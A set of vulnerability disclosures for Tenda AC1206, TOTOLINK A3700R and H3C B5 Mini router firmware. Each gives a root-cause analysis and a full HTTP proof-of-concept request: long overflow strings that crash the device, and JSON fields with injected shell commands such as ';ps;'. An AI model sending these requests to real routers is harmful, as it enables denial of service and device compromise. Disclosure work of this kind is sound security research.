Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the list parameter at the function fromSetRouteStatic.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromSetRouteStatic function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the fromSetRouteStatic function, list (the value of list) we entered will be passed into the save_staticroute_data function as a parameter, and this function has stack overflow.

In the save_staticroute_data function,the buf (the value of list) is formatted using the sscanf function and in the form of %[^,],%[^,],%[^,],%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of dst_net、 net_mask、 net_gw or net_ifname, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetStaticRouteCfg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,b,c,d~
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37800: vuln/Tenda/AC1206/7 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the list parameter at the function formSetQosBand.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formSetQosBand function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formSetQosBand function, list (the value of list) we entered will be passed into the setQosMiblist function as a parameter, and this function has stack overflow.

In the setQosMiblist function,the qos_str (the value of list) is formatted using the sscanf function and in the form of ;%[^;];%[^;];%[^;];%[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of limit_en、mac、 tmp_urate or tmp_drate, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetNetControlList HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    list=;a;b;c;dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd;
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37801: vuln/Tenda/AC1206/9 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the page parameter in the function fromNatStaticSetting.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromNatStaticSetting function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the fromNatStaticSetting function,the page we entered (the value of page) is formatted with the sprintf function, spliced with %s strings, and saved to gotopage. It is not secure, as long as the size of the data we enter is larger than the size of gotopage, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/NatStaticSetting HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37802: vuln/Tenda/AC1206/6 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the page parameter in the function fromAddressNat.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromAddressNat function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the fromAddressNat function,the page we entered (the value of page) is formatted with the sprintf function, spliced with %s strings, and saved to gotopage. It is not secure, as long as the size of the data we enter is larger than the size of gotopage, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/addressNat HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37803: vuln/Tenda/AC1206/8 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the time parameter in the function saveParentControlInfo.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the saveParentControlInfo function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the saveParentControlInfo function,time(the value of time) we entered is formatted using the sscanf function and in the form of %[^-]-%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of starttime or endtime, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 340
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-bbb
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37804: vuln/Tenda/AC1206/3 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the function fromWizardHandle.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromWizardHandle function. An attacker can obtain a stable root shell through a carefully constructed payload.

When wanflag > = wanport and want=2, we can reach the vulnerable branch.

Stack overflow vulnerability occurs in the decodepwd function.

The decodepwd function is equivalent to copying data from and filtering "/" symbols.As long as the pppoepwd(the value of PPW) we enter exceeds the size of the decode_pwd array, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WizardHandle HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 12
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    WANS=0&WANT=2&PPW=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

Finally, you also can write exp to get a stable root shell.

CVE-2022-37805: vuln/Tenda/AC1206/1 at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a command injection vulnerability via the hostName parameter in the function setOpModeCfg.

Permalink

**TOTOLink A3700R V9.1.2u.6134\_B20201202 Has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

TOTOLINK A3700R (V9.1.2u.6134\_B20201202) was found to contain a command insertion vulnerability in setOpModeCfg.This vulnerability allows an attacker to execute arbitrary commands through the "hostName" parameter.

By calling these functions, we can ultimately call sub\_4241E0 function (as shown in the last picture). By setting the proto value to 1, we can reach the default branch.V48 passes directly into the dosystem function.

The dosystem function is finally found to be implemented in this file by string matching.

Reverse analysis found that the function was called directly through the system function, which has a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 52
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"hostName":"admin';ps #","proto":"1","opmode":"br","topicurl":"setOpModeCfg"}
    

The above figure shows the POC attack effect

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36461: vuln/readme.md at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a command injection vulnerability via the host_time parameter in the function NTPSyncWithHost.

Permalink

**TOTOLink A3700R V9.1.2u.6134\_B20201202 Has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

TOTOLINK A3700R (V9.1.2u.6134\_B20201202) was found to contain a command insertion vulnerability in NTPSyncWithHost.This vulnerability allows an attacker to execute arbitrary commands through the "host\_time" parameter.

Var passes directly into the dosystem function.

The dosystem function is finally found to be implemented in this file by string matching.

Reverse analysis found that the function was called directly through the system function, which has a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 52
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"host_time":"2022-07-19 22:24:46';ps;'","topicurl":"NTPSyncWithHost"}
    

The above figure shows the POC attack effect

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36459: vuln/readme.md at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a command injection vulnerability via the command parameter in the function setTracerouteCfg.

Permalink

**TOTOLink A3700R V9.1.2u.6134\_B20201202 Has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

TOTOLINK A3700R (V9.1.2u.6134\_B20201202) was found to contain a command insertion vulnerability in setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

Format var into V6 using sprintf function and pass in dosystem function.

The dosystem function is finally found to be implemented in this file by string matching.

Reverse analysis found that the function was called directly through the system function, which has a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 52
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"command":";ps;","num":"1","topicurl":"setTracerouteCfg"}
    

The above figure shows the POC attack effect

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36458: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function EditMacList.d.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the EditMacList function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the EditMacList function, V12(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V19, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=EditMacList&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

Tag

#firefox